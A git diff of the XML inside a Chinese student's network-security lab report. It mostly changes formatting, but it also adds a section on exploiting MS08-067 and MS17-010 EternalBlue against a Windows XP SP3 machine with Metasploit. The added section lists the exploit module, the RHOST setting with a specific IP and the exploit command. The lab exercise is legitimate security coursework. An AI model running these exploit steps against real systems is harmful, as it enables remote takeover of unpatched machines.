--- a/网安/201600301079-崔玉峰-实验八.docx
+++ b/网安/201600301079-崔玉峰-实验八.docx
@@ -329,6 +329,7 @@
             <w:pPr>
               <w:pStyle w:val="2"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:adjustRightInd w:val="0"/>
@@ -714,6 +715,7 @@
           <w:p>
             <w:pPr>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:spacing w:line="300" w:lineRule="auto"/>
@@ -940,9 +942,49 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="20"/>
+                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">           Windos xp sp3</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="240" w:firstLineChars="100"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Metasploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -1086,19 +1128,19 @@
               <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="22"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="21"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> 安装curl 方便下载</w:t>
@@ -1106,10 +1148,10 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="22"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="21"/>
               </w:rPr>
               <w:t>Metasploit</w:t>
             </w:r>
@@ -1126,20 +1168,20 @@
               <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="22"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="21"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="22"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="21"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">通过curl命令下载安装 </w:t>
@@ -1147,20 +1189,20 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="22"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="21"/>
               </w:rPr>
               <w:t>Metasploit</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="22"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="21"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>：</w:t>
@@ -1170,6 +1212,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:spacing w:line="300" w:lineRule="auto"/>
@@ -1234,6 +1277,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:spacing w:line="300" w:lineRule="auto"/>
@@ -1444,6 +1488,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:spacing w:line="300" w:lineRule="auto"/>
@@ -1608,6 +1653,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:spacing w:line="300" w:lineRule="auto"/>
@@ -1940,6 +1986,12 @@
           </w:p>
           <w:p>
             <w:pPr>
+              <w:ind w:left="240"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:numPr>
                 <w:ilvl w:val="0"/>
                 <w:numId w:val="3"/>
@@ -1964,9 +2016,18 @@
                 <w:szCs w:val="22"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> 测试MS08-067</w:t>
-            </w:r>
-            <w:r>
+              <w:t xml:space="preserve"> 测试MS08-067：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:spacing w:line="300" w:lineRule="auto"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                 <w:b/>
@@ -1975,17 +2036,8 @@
                 <w:szCs w:val="22"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>：</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:numPr>
-                <w:numId w:val="0"/>
-              </w:numPr>
-              <w:spacing w:line="300" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
                 <w:b/>
@@ -1994,17 +2046,18 @@
                 <w:szCs w:val="22"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
-                <w:b/>
-                <w:bCs/>
+              <w:t xml:space="preserve">       </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">       查询攻击者的IP：121.250.213.41</w:t>
+              <w:t>查询攻击者的IP：121.250.213.41</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2172,6 +2225,7 @@
           <w:p>
             <w:pPr>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:spacing w:line="300" w:lineRule="auto"/>
@@ -2281,6 +2335,7 @@
           <w:p>
             <w:pPr>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:spacing w:line="300" w:lineRule="auto"/>
@@ -2398,6 +2453,7 @@
           <w:p>
             <w:pPr>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:spacing w:line="300" w:lineRule="auto"/>
@@ -2504,6 +2560,7 @@
           <w:p>
             <w:pPr>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:spacing w:line="300" w:lineRule="auto"/>
@@ -2619,6 +2676,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:jc w:val="both"/>
@@ -2632,6 +2690,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:jc w:val="both"/>
@@ -2905,6 +2964,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:jc w:val="center"/>
@@ -2965,6 +3025,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:jc w:val="center"/>
@@ -2978,6 +3039,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:jc w:val="center"/>
@@ -3030,6 +3092,7 @@
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:jc w:val="center"/>
@@ -3038,13 +3101,12 @@
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="1"/>
           </w:p>
           <w:p>
             <w:pPr>
               <w:widowControl w:val="0"/>
               <w:numPr>
+                <w:ilvl w:val="0"/>
                 <w:numId w:val="0"/>
               </w:numPr>
               <w:jc w:val="both"/>
@@ -3063,6 +3125,579 @@
           </w:p>
           <w:p>
             <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="3"/>
+              </w:numPr>
+              <w:spacing w:line="300" w:lineRule="auto"/>
+              <w:ind w:left="420" w:leftChars="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 测试MS17-010永恒之蓝：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:spacing w:line="300" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:spacing w:line="300" w:lineRule="auto"/>
+              <w:ind w:left="560" w:hanging="560" w:hangingChars="200"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">       </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>MS17-010永恒之蓝,就是最有名的比特币勒索病毒所利用的漏洞，通过此漏洞可以直接控制对方电脑，执行代码属于严重漏洞。本次就通过msf来模拟这个漏洞攻击目标主机windos xp sp3：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:spacing w:line="300" w:lineRule="auto"/>
+              <w:ind w:left="560" w:hanging="440" w:hangingChars="200"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:ind w:left="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="100"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>① Search smb_ms17_010</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:spacing w:line="300" w:lineRule="auto"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+                  <wp:extent cx="3346450" cy="2937510"/>
+                  <wp:effectExtent l="0" t="0" r="6350" b="15240"/>
+                  <wp:docPr id="3" name="图片 1"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="3" name="图片 1"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId19"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3346450" cy="2937510"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                          <a:ln w="9525">
+                            <a:noFill/>
+                          </a:ln>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:ind w:left="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="100"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">② use exploit/windows/smb/ms17_010_eternalblue  </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:ind w:left="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="100"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>③ set RHOST 121.250.213.15</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:ind w:left="420" w:leftChars="0" w:firstLine="210" w:firstLineChars="100"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+                  <wp:extent cx="3492500" cy="486410"/>
+                  <wp:effectExtent l="0" t="0" r="12700" b="8890"/>
+                  <wp:docPr id="18" name="图片 3"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="18" name="图片 3"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId20"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3492500" cy="486410"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                          <a:ln w="9525">
+                            <a:noFill/>
+                          </a:ln>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:ind w:left="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="100"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>④ exploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:ind w:left="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="100"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>开始攻击目标机器：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:ind w:left="420" w:leftChars="0" w:firstLine="210" w:firstLineChars="100"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+                  <wp:extent cx="4009390" cy="3008630"/>
+                  <wp:effectExtent l="0" t="0" r="10160" b="1270"/>
+                  <wp:docPr id="19" name="图片 4"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="19" name="图片 4"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId21"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="4009390" cy="3008630"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                          <a:ln w="9525">
+                            <a:noFill/>
+                          </a:ln>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:ind w:left="420" w:leftChars="0" w:firstLine="240" w:firstLineChars="100"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
